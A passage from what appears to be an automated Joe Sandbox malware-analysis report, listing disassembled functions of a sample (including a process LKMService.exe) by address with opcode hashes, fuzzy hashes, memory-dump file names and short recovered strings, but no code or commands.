API ID:
String ID:
API String ID:
Opcode ID: 2ce62461500536b696d57e4b0af27a6ef7d5205a82ba81c9b3f19443e4dc73ae
Instruction ID: 9417a6d245d7040fc1a40c5b1540179e2e625ea5c6f188bbab09ad9b2454fb8e
Opcode Fuzzy Hash: 2ce62461500536b696d57e4b0af27a6ef7d5205a82ba81c9b3f19443e4dc73ae
Instruction Fuzzy Hash: 16116132D1071AABCB04CFA9E8805DDFBB5FF89310F198666E421B7160EB702556CB90

Function 02AD0989 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e5897b9ab8b6384502b7a021d8b22260ed17689fcd1404454f79d7c0920d73e
Instruction ID: 657abcecd2b904fdfff1d263fcbd85e7a7c8dc46341a5bfe67a8111473242cdc
Opcode Fuzzy Hash: 9e5897b9ab8b6384502b7a021d8b22260ed17689fcd1404454f79d7c0920d73e
Instruction Fuzzy Hash: 0E110738944245CFCB05FF64E998A58BB71FF84301F209A69D815D7279FB30AE59CB90

Function 02AD0CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb43fb6365d0fe136423b9e2a42a75ae891cae74cb6c5aa129e215a6e164882c
Instruction ID: 7baec4d54b106f5eb5464ef0370bfd2552066e787cad792265153da213592015
Opcode Fuzzy Hash: eb43fb6365d0fe136423b9e2a42a75ae891cae74cb6c5aa129e215a6e164882c
Instruction Fuzzy Hash: 06011E32D1061AABCF04DFA9D8404DDFBB9FF99310F158626E521B7260EB742556CB90

Function 0299D035 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675124151.000000000299D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0299D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_299d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f4f77547f90dc962ba327ff2193b6b822bc1ce26469cf5484fe37bddb8098e
Instruction ID: a29008a5993eea2ef07421e8183e5987a093471eb276c1f1ccb6ec9b7afcc45f
Opcode Fuzzy Hash: 41f4f77547f90dc962ba327ff2193b6b822bc1ce26469cf5484fe37bddb8098e
Instruction Fuzzy Hash: 1B01A7714093409AEB106A2DCDC4767BF9CEF45334F18C92AED094B186C779D846CA71

Function 02AD0810 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfbfada2710159788a5d915441d13f90083073231521d9ad3c1be148c7c076a
Instruction ID: 79eb4dd96e4e10b312875662be5148b78befd7b158971cca0835fe9c2c456c4f
Opcode Fuzzy Hash: 8bfbfada2710159788a5d915441d13f90083073231521d9ad3c1be148c7c076a
Instruction Fuzzy Hash: 6D017C32D1061A9ACB04DBB9D8444DEFBB6EFC9310F168666D111771A4EB70258ACBE1

Function 02AD0879 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f6b89459f7e258dec74d33befaea468cb41dfd27f1e1afcda9b12df45d488e6
Instruction ID: 0cd921a802f3f544cb11272892e8eead8a3893f63fb6818873e92d9341ad0996
Opcode Fuzzy Hash: 3f6b89459f7e258dec74d33befaea468cb41dfd27f1e1afcda9b12df45d488e6
Instruction Fuzzy Hash: B801B132D0464A9BCB049BB9D8004DDFBB6EFCA310F168A56D111771A1EB70258ACBA1

Function 02AD0998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39df222d887929d9f200efe48f9594de55ca06ec8d3c3be919cc1f72fc46d81b
Instruction ID: 607de3ab1891dc160b937421041e65de5f29042a051c235658f7eef10b4bf2b0
Opcode Fuzzy Hash: 39df222d887929d9f200efe48f9594de55ca06ec8d3c3be919cc1f72fc46d81b
Instruction Fuzzy Hash: C511F538940246CFCB05FF24EA98A58BBB1FF44301B209668D805C7238FB30AE59CB90

Function 02AD1DF8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a165d0642ec959dbc4fc94459eb55a2757b2ede7a6df3914a46c9bdd5271157e
Instruction ID: f45071d33f83b4de3494a62f674e9c1a3b6050beb92be4179e4ec38afa323913
Opcode Fuzzy Hash: a165d0642ec959dbc4fc94459eb55a2757b2ede7a6df3914a46c9bdd5271157e
Instruction Fuzzy Hash: A001D432E0464B9BCF10DBB9C8405EDFBB2EFCA310F198656D11177161EB70259ACB90

Function 02AD1D58 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c70bbb8fa58a3dc3c2ebef67ad686b6647a65f7bbcf2e50b42e6db32f731c3a
Instruction ID: c5b54a2a354eb9f758e1478a8b347ba5faa2fb8bd1b4bdee067a43812ec7e21e
Opcode Fuzzy Hash: 8c70bbb8fa58a3dc3c2ebef67ad686b6647a65f7bbcf2e50b42e6db32f731c3a
Instruction Fuzzy Hash: 3A018831A40214CFDB25AB64C855BEEB772FB89304F14452DD486AB394CF765C02CF90

Function 02AD13E0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa658272ee4d5f7be20c20cfd0911e201cfad3a911e65db07378366f2840f7b
Instruction ID: 92ce2ddf32c6e40517562e45a9073dec4c26b9ec12e95d9c9ea8ee0b13e4782c
Opcode Fuzzy Hash: faa658272ee4d5f7be20c20cfd0911e201cfad3a911e65db07378366f2840f7b
Instruction Fuzzy Hash: 47018432D1464A9BCF05DBB8D8004DDFB76EFCA300F1986A6D111B75A0EB70259ACBA1

Function 02AD1D68 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5189d4401f1878e4b1a3aabbe60f8ea74e7b23213802deef7c5c7a39efee791
Instruction ID: e886ac31144f8914794b7adbdd25900576f587e7fb23abf06b9ac00176f6a4aa
Opcode Fuzzy Hash: c5189d4401f1878e4b1a3aabbe60f8ea74e7b23213802deef7c5c7a39efee791
Instruction Fuzzy Hash: 1401AD35A00318DBDB15AB64C814BAEB7B2FB88304F10442DD447AB394CFB6AC01CF90

Function 02AD1468 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee95544df04d9a7854e8e9c99c909bcf6c59ac585107b5b6ba2d537e75e9903
Instruction ID: c2a61df7ed568cfffe3d557c9c70ffda030432572385c7a8c88a047a03e95b99
Opcode Fuzzy Hash: eee95544df04d9a7854e8e9c99c909bcf6c59ac585107b5b6ba2d537e75e9903
Instruction Fuzzy Hash: 3FF046B1E4024A9BDF108BB4C469AFFBFB2DF81300F08446AC043AB244CE70290ACBC1

Function 02AD0D51 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939ba5835ef109a5f7b1aa25021b55cae49b5f313c73c70626a82ffc7e02ca56
Instruction ID: c425c8a728218fca24589ef986f2ffbc019f0ac41ea012e04d6417cb1238d5e9
Opcode Fuzzy Hash: 939ba5835ef109a5f7b1aa25021b55cae49b5f313c73c70626a82ffc7e02ca56
Instruction Fuzzy Hash: B1F0F672E102499BDF15DB78C5A59EEFFB29F84300F184426C443AB295DE707906CBC5

Function 0299D034 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675124151.000000000299D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0299D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_299d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0650b3d06fb1ab9275882ed00563414ff19a40b285e3815a918aaeab9a743b67
Instruction ID: 61f7850a03450da04a24523c2b9a4bcc4e276d122af4af6df9897b11d98d47fb
Opcode Fuzzy Hash: 0650b3d06fb1ab9275882ed00563414ff19a40b285e3815a918aaeab9a743b67
Instruction Fuzzy Hash: D5F062714083449EEB109E1AC8C8B62FFACEB55735F18C45AED085F286C3799845CA71

Function 02AD1E80 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0351ee3014d28c11206b7fae8be7e179cd5faa39a2a778a7ce46e0f5e4c3559e
Instruction ID: 94ca5080b02dac3877ed9f442c5bd59ca41260fe8fb1aab5605fb3910a00e2f4
Opcode Fuzzy Hash: 0351ee3014d28c11206b7fae8be7e179cd5faa39a2a778a7ce46e0f5e4c3559e
Instruction Fuzzy Hash: 2FF0C272A101499BDB159BB4C4656FFBFB25F84300F08492AD403AB254DEB559068BC1

Function 02AD0901 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc6672fcec4184d9cdc1151417ce5701c523e1bb389dbb0e6fabf77e2c0f4de
Instruction ID: 7639778563bd4d307880d44dc4880a60e1ab4a61736f706c40f164fa17e5ffb3
Opcode Fuzzy Hash: cbc6672fcec4184d9cdc1151417ce5701c523e1bb389dbb0e6fabf77e2c0f4de
Instruction Fuzzy Hash: FBF02B72E0014997DB04AB74C8559EFBFB29FC4300F044936D013BB254EEB15906C6C1

Function 02AD1E90 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d7781199d552bf2ee987843ac891be54a8cef1f988ae090a25bcb63894ee8e
Instruction ID: edc15bc467e571c2713dd2dc22a3bb19f25f0113efa3902c3e996529ac4f9b51
Opcode Fuzzy Hash: f8d7781199d552bf2ee987843ac891be54a8cef1f988ae090a25bcb63894ee8e
Instruction Fuzzy Hash: FAF08272E101099BDF14DB74C5559FFBBB6AF84300F05892AD413BB294DFB0A9068AD5

Function 02AD1478 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81aaa12ef236c77b4404a887c5b0a8cc634059318f0e996ebd74bd78284baeef
Instruction ID: 4d5f9ec1386fd88844fa09d6e19b94e8f6d8aaed52e3810391e420108a7e0ecc
Opcode Fuzzy Hash: 81aaa12ef236c77b4404a887c5b0a8cc634059318f0e996ebd74bd78284baeef
Instruction Fuzzy Hash: 24F0E2B2E102099BDF14DBA4C515AEFBFBA9F84300F048826D003BB254DE706A06CAD2

Function 02AD0910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a49d8a60b49de56ac5731699cf3e0daeadf89660934011648b3b0b63b30c38
Instruction ID: 5f250ebe1257bbff7da966040bd48aebd632d5d23717a5f9a17de14bafe57fac
Opcode Fuzzy Hash: e7a49d8a60b49de56ac5731699cf3e0daeadf89660934011648b3b0b63b30c38
Instruction Fuzzy Hash: F8F0E272E102099BEB04DB64C555AEFBFB69F84300F058936D013BB294DEB06906CAC1

Function 02AD1390 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4af39170debab46c3203610ab636feddc6622db5443e3d2ebb12b9d1936824b
Instruction ID: bb85f8fb7b6f66eca09d53add0aa7c20fc2c574c6dce0163e1f14be0caf763bd
Opcode Fuzzy Hash: d4af39170debab46c3203610ab636feddc6622db5443e3d2ebb12b9d1936824b
Instruction Fuzzy Hash: CAE09A0274D2D00FCB1263B914655BE6FA78ECB320B1800EBD08ADB387CC544C03CB9A

Function 02AD0838 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886704ed46f77c29317e6cabc0101a46490953924e7436b603c4ab010b1b7ec5
Instruction ID: 9c4d2d07cf85d2ab5284185a19b6c4259d7f335e35644eb6ef56369d51e21209
Opcode Fuzzy Hash: 886704ed46f77c29317e6cabc0101a46490953924e7436b603c4ab010b1b7ec5
Instruction Fuzzy Hash: D9E0CD51400541C5FA5BD7F49199B6C3BB0DFC1344F1C0DC6DC955D291CF168957D2C2

Function 02AD0848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d23ecfb5fb7db5788a5abe3b2146839d30d64f68c4e075d8cb6ae1d75326ac
Instruction ID: 9f045a072f5e1f5b5e24fe014ccfa00250c283cb85059a00a9f4a27685c75a58
Opcode Fuzzy Hash: 09d23ecfb5fb7db5788a5abe3b2146839d30d64f68c4e075d8cb6ae1d75326ac
Instruction Fuzzy Hash: 59D017B1D45348AFDB15CFA4C44575D7BB8AB45280F204595E449C7201EB319E10C791

Function 02AD1605 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5527291515e0d6c99d6063cb311dab34e0a5b4651916201a9fdf45b4732b732b
Instruction ID: 9b7d8c2353678d9d88675e789dd2de9744e3b706abf15941115ed0e486cc19d6
Opcode Fuzzy Hash: 5527291515e0d6c99d6063cb311dab34e0a5b4651916201a9fdf45b4732b732b
Instruction Fuzzy Hash: EBD0A776F063845FCF119FB8A80009CBF70DAC113070882E3C059C7162C630C454C722

Analysis Process: LKMService.exePID: 7500, Parent PID: 7428COMMON

Executed Functions

Function 025A6D88 Relevance: 3.0, Strings: 2, Instructions: 526COMMON

Download Yara Rule

Strings

4mq, xrefs: 025A6DD2
fpq, xrefs: 025A6FED

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: fpq$4mq
API String ID: 0-3504371490
Opcode ID: b76ebd2c33d1f19ff036b4d0219bae284f639883166a11ebfb1ec585a59f6655
Instruction ID: e2181f16c570f0f601f4da678565e9fde8d41a97ab6045c0f9f6d6952bcbd962
Opcode Fuzzy Hash: b76ebd2c33d1f19ff036b4d0219bae284f639883166a11ebfb1ec585a59f6655
Instruction Fuzzy Hash: 7B221870A003198FCB15DFA8C89499DBBF2FF89310F1586A9E415AF3A5DB309D46CB94

Function 025A40BA Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

fpq, xrefs: 025A41CB

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: fpq
API String ID: 0-3306291180
Opcode ID: a13b450ae963ca1cef2640074d08fb1f57e660b75a1f2baeae24514903ecf416
Instruction ID: c87f8dde433a6d623aad8f75298d194e6e7dd7cfdf0a33c4030430c68ce20c39
Opcode Fuzzy Hash: a13b450ae963ca1cef2640074d08fb1f57e660b75a1f2baeae24514903ecf416
Instruction Fuzzy Hash: A0C19C74A002058FDB15DFA8D491A9DBBF2FF89310F1985A9E405EB3A5DB30EC86CB54

Function 025A0E48 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ed5306e463cfb939bc0db0dbb97af3bf38453a7b6685abf85d39a8557ba514
Instruction ID: 583c378b95270d9ec36bafd96e38f6de941de91f957109ed39f6b07e23cd4bc5
Opcode Fuzzy Hash: 80ed5306e463cfb939bc0db0dbb97af3bf38453a7b6685abf85d39a8557ba514
Instruction Fuzzy Hash: 72020A74A012049FCB15DF68D494A9DBBF2FF89320F098599E809EB366DB30ED85CB54

Function 025A2B92 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79391287616ce284547dae44c8ebb201e77e2538a0f9b75fcf4d292d7c67ccee
Instruction ID: 44cb66afb4142d64b6f01e2ec0be0fe45059b0b278f20ebd7c627915d7c4c6e6
Opcode Fuzzy Hash: 79391287616ce284547dae44c8ebb201e77e2538a0f9b75fcf4d292d7c67ccee
Instruction Fuzzy Hash: 8AF13A70A002059FCB05DF68D695A9DBBF2FF88310B258595E809EB366DB30FE46CB54

Function 025A5310 Relevance: 5.2, Strings: 4, Instructions: 195COMMON

Download Yara Rule

Strings

(oq, xrefs: 025A5586
(oq, xrefs: 025A555A
xoq, xrefs: 025A549F
xoq, xrefs: 025A5443

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: (oq$(oq$xoq$xoq
API String ID: 0-1338631573
Opcode ID: b72a2797dd0c9e539ce8cbd14c054de1ca2e29e0f9471b6231166d71007f7ee6
Instruction ID: d7490f58ea12f170d5ba9a0d8002042a43a604a283817ed1c5d2fb15e01f9138
Opcode Fuzzy Hash: b72a2797dd0c9e539ce8cbd14c054de1ca2e29e0f9471b6231166d71007f7ee6
Instruction Fuzzy Hash: ED61A3317002049FDB159F69D851BAE7FA2FF89310F548469E90A9B3A1DF75EC42CBA0

Function 025A5BFD Relevance: 3.2, Strings: 2, Instructions: 675COMMON

Download Yara Rule

Strings

4mq, xrefs: 025A5F46
fpq, xrefs: 025A6123

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: fpq$4mq
API String ID: 0-3504371490
Opcode ID: 4adaf4947394843c831d3783b508cb6ae48869d81186cc4b3e8b4fdd4cde9a6f
Instruction ID: 76d5dde44663162f1f4b0d1549d7cb00b7730ae079043f3e5759b6d87b0587c4
Opcode Fuzzy Hash: 4adaf4947394843c831d3783b508cb6ae48869d81186cc4b3e8b4fdd4cde9a6f
Instruction Fuzzy Hash: 8CC14571A012099FCB09CFA8D981A9DBBF6FF89310F1581A5E845EB365DB30ED45CB60

Function 025A5300 Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

xoq, xrefs: 025A5443

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: xoq
API String ID: 0-2982640460
Opcode ID: ec989429d721ca86eadf7a91c22480f27168a4a8efdef0f2076d082a6771dd8d
Instruction ID: ea6754e3dbded50c75e60de7c1cd6640f1c10835e67857449e2131484afb5802
Opcode Fuzzy Hash: ec989429d721ca86eadf7a91c22480f27168a4a8efdef0f2076d082a6771dd8d
Instruction Fuzzy Hash: 7C41A2317002049FDB15DF68D855FAE7BA2FF88314F558468E91A9B3A1DB72EC82CB50

Function 025A6751 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

LRkq, xrefs: 025A67AC

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: LRkq
API String ID: 0-1052062081
Opcode ID: 7fac7638e0e80fbc9a656759e9df8587da052b3ffc30fd3282f877cddf4bb274
Instruction ID: ee7e412c461d3e76e57fb706154ae387a6eb8ad92e792ab2a0540e57c630afe8
Opcode Fuzzy Hash: 7fac7638e0e80fbc9a656759e9df8587da052b3ffc30fd3282f877cddf4bb274
Instruction Fuzzy Hash: 24316971E012459FDB19DB78D9A6B9D7FF6BF49214F2880A9E002EB3A5DA349C40CB14

Function 025A6778 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

LRkq, xrefs: 025A67AC

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: LRkq
API String ID: 0-1052062081
Opcode ID: 4543e063e00a6e5d1f3ff7233004db2efd184bdaebb58cddc32b9efc35ae13f5
Instruction ID: 136dafbf7e02c45d39adbb9b75d07f14c9e7a661a141828dabaf0409106b13cd
Opcode Fuzzy Hash: 4543e063e00a6e5d1f3ff7233004db2efd184bdaebb58cddc32b9efc35ae13f5
Instruction Fuzzy Hash: 1C312931E002099FCB14DB69D6A6A9EBBFAFF48310F248469E402EB364DB349D40CB54

Function 025A6788 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

LRkq, xrefs: 025A67AC

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: LRkq
API String ID: 0-1052062081
Opcode ID: 3ffc773de832daf739181873353cdfa8746834225867f640034ac5458fbe3aca
Instruction ID: d39b67827ff4001a7935baddddbed9d41f790880242472bb75c90f26394218d4
Opcode Fuzzy Hash: 3ffc773de832daf739181873353cdfa8746834225867f640034ac5458fbe3aca
Instruction Fuzzy Hash: B1313A34E002099FCB14DF79D6A5A9EBBFABF48310F248069E406A73A4DB30AC40CB54

Function 025A63F0 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

`lq, xrefs: 025A642B

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: `lq
API String ID: 0-2378346327
Opcode ID: 1c342bb21daea81bfb649faf351ccb5906dcc51f832ba1961748cd4e50346f4c
Instruction ID: 9481543c43cf0b73cb3010edb5dd7433890711c00c1a13d13998d47dd715ebe2
Opcode Fuzzy Hash: 1c342bb21daea81bfb649faf351ccb5906dcc51f832ba1961748cd4e50346f4c
Instruction Fuzzy Hash: 6E21E130A002149FCF24DF69D940ACEBBF5FF88310B048A6DD499AB394DB30E945CBA1

Function 025A63DF Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

`lq, xrefs: 025A642B

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID: `lq
API String ID: 0-2378346327
Opcode ID: c8410655945bedb942a4491ce12201419bc4993cf4898003bb908e3baa2484f2
Instruction ID: 4338f419fb75835e61cd2bdb4d6578e41b1b9bd9fe057045ab903d9b6e842f6c
Opcode Fuzzy Hash: c8410655945bedb942a4491ce12201419bc4993cf4898003bb908e3baa2484f2
Instruction Fuzzy Hash: 27112131A00214ABCB21DF69E8516CEBBF5FF89310B04856DD445A7315DB31E949CBA1

Function 025A0E39 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d06b36cf84417a7e85695af408af5291815bef62d866f4f3b023a5e7aa20c8
Instruction ID: 5ba361e28147b39791521c76fa55fbd690260129367db03c34ee7ab83714a902
Opcode Fuzzy Hash: 97d06b36cf84417a7e85695af408af5291815bef62d866f4f3b023a5e7aa20c8
Instruction Fuzzy Hash: DDB12834A017049FCB15DF68D494A9DBBF2FF89320F058599E849AB366DB30ED85CB90

Function 025A4155 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4f7a72fa3504dfaeb0defde5c537c0903eedcf27b22d3276c0b7b1d56ba809
